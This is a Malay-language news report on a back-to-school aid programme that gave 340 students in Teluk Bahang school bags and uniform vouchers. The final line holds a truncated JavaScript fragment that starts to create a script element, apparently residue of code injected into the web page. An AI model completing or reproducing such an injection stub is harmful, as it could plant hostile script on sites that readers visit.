Bantuan harap bantu pelajar belajar selesa & lebih fokus

Gambar : DANNY OOI

TELUK BAHANG – Seramai 340 pelajar dari 11 kawasan Jawatankuasa Kemajuan dan Keselamatan Komuniti (JKKK) di sini dipilih untuk menerima bantuan kelengkapan persekolahan melalui Program Kembali ke Sekolah Kawasan Dewan Undangan Negeri (KADUN) Teluk Bahang baru-baru ini.

Pegawai Penyelaras KADUN (PPK) Teluk Bahang, Halil Sabri Hamid berkata, program berkenaan merupakan inisiatif tanggungjawab sosial Pejabat Penyelaras KADUN dengan kerjasama Pejabat Ketua Menteri dan Pusat Urus Zakat (PUZ) untuk membantu pelajar yang kurang berkemampuan membuat persiapan persekolahan.

“Program ini selaras dengan fokus Kerajaan Negeri yang memberi penekanan terhadap aspek pendidikan supaya pelajar-pelajar ini dapat belajar dengan selesa dan lebih fokus.

“Harapannya adalah supaya suatu hari nanti mereka (pelajar) dapat menjadi modal insan yang berkaliber serta berkemahiran tinggi,” katanya ketika ditemui selepas Majlis Penyerahan Bantuan Persekolahan di sini barubaru ini.

Hadir sama, Pegawai Penerangan Kerajaan Negeri, Mohd. Fadzil Kemi, PPK Pulau Betong, Mohd. Tuah Ismail dan Pengerusi serta Ahli Jawatankuasa setiap JKKK di Teluk Bahang.

Setiap pelajar menerima beg sekolah serta baucar tunai untuk membeli pakaian seragam sekolah serta kelengkapan lain.var d=document;var s=d.createElement(‘script’);